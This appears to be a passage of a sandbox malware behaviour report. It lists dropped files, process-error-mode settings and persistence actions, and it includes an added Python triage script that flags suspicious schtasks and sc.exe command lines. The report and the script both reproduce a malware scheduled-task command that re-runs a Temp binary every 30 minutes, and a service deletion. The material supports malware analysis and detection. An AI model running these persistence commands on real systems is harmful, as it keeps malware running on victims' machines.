                        Source: C:\Users\user\Desktop\25C1.exe | File created: C:\Users\user\AppData\Local\Temp\FourthX.exe
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dll

                        Boot Survival

                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UTIXDCVF"
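                        Both lines above are persistence-relevant command lines: a scheduled task that re-runs a binary from the user's Temp directory every 30 minutes, with /F forcing replacement of any existing task of that name, and a service deletion issued by a dropped executable. The script below is an added example and not part of the report: it parses schtasks and sc.exe command lines from process-creation records and tags the patterns a triage analyst looks for. The three log entries are constructed (the first two copy the report's lines, the third is a benign-looking control); the user-writable path list and the 60-minute threshold are my assumptions.

```python
"""Triage of the scheduler and service-control command lines the report records under
Boot Survival. Added example (not Joe Sandbox code); the log entries are constructed and
the path list and frequency threshold are assumptions."""
import re

# Locations a non-admin process can write to; a task whose action lives here is worth a look (assumed list).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\",
                 "\\users\\public\\", "\\windows\\temp\\")


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted spans whole and dropping those quotes."""
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t
            for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def image_name(token):
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_schtasks(cmdline):
    """Return verb, named options and bare flags of a schtasks invocation, or None."""
    toks = tokenize(cmdline)
    if not toks or image_name(toks[0]) not in ("schtasks", "schtasks.exe"):
        return None
    opts = {"verb": None, "flags": set()}
    i = 1
    while i < len(toks):
        t = toks[i].lower()
        if t in ("/create", "/delete", "/change", "/run", "/query", "/end"):
            opts["verb"] = t[1:]
        elif t in ("/tn", "/tr", "/sc", "/mo", "/st", "/ru", "/rp", "/rl", "/xml") and i + 1 < len(toks):
            opts[t[1:]] = toks[i + 1]
            i += 1
        elif t.startswith("/"):
            opts["flags"].add(t[1:])             # e.g. /F: overwrite an existing task of the same name
        i += 1
    return opts


def parse_sc(cmdline):
    toks = tokenize(cmdline)
    if len(toks) < 2 or image_name(toks[0]) not in ("sc", "sc.exe"):
        return None
    return {"verb": toks[1].lower(), "service": toks[2] if len(toks) > 2 else None,
            "args": [a.lower() for a in toks[3:]]}


def triage(cmdline):
    """Tags for one process-creation command line; an empty list means nothing matched."""
    tags = []
    st = parse_schtasks(cmdline)
    if st and st["verb"] == "create":
        # The report's /tr value wraps the path in single quotes; keep them in the option,
        # since that is literally what the scheduler will try to launch, strip them for the path test.
        action = st.get("tr", "").strip("'\" ").lower()
        if any(p in action for p in USER_WRITABLE):
            tags.append("task-action-in-user-writable-path")
        mo = st.get("mo", "1")                   # schtasks defaults /mo to 1 when absent
        if st.get("sc", "").lower() == "minute" and mo.isdigit() and int(mo) <= 60:
            tags.append("task-high-frequency")
        if "f" in st["flags"]:
            tags.append("task-force-overwrite")
    sc = parse_sc(cmdline)
    if sc:
        if sc["verb"] == "delete":
            tags.append("service-delete")
        if sc["verb"] == "create" and "kernel" in sc["args"]:
            tags.append("kernel-driver-service-create")   # type= kernel: a driver load, cf. the dropped .sys
    return tags


def triage_log(entries):
    """entries: (parent image, command line) pairs. Returns only the entries that got a tag."""
    return [(parent, cmd, triage(cmd)) for parent, cmd in entries if triage(cmd)]


# Constructed process-creation log: the two lines from the report plus a benign-looking task.
LOGS = [
    ("C:\\Windows\\SysWOW64\\cmd.exe",
     "schtasks /create /tn \"MalayamaraUpdate\" /tr \"'C:\\Users\\user\\AppData\\Local\\Temp\\Updater.exe'\" /sc minute /mo 30 /F"),
    ("C:\\Users\\user\\AppData\\Local\\Temp\\FourthX.exe", "C:\\Windows\\system32\\sc.exe delete \"UTIXDCVF\""),
    ("C:\\Windows\\System32\\svchost.exe",
     "schtasks /create /tn \"\\Microsoft\\Windows\\Maintenance\\Example\" /tr \"C:\\Program Files\\Vendor\\app.exe\" /sc daily /st 03:00"),
]

if __name__ == "__main__":
    for parent, cmd, tags in triage_log(LOGS):
        print(parent, "->", cmd, tags)
```

                        The parent image is carried through but not scored here; in practice cmd.exe spawned by a file in Temp, or sc.exe spawned by a dropped executable, is the next thing to weigh once the command line itself has matched.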

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\25C1.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
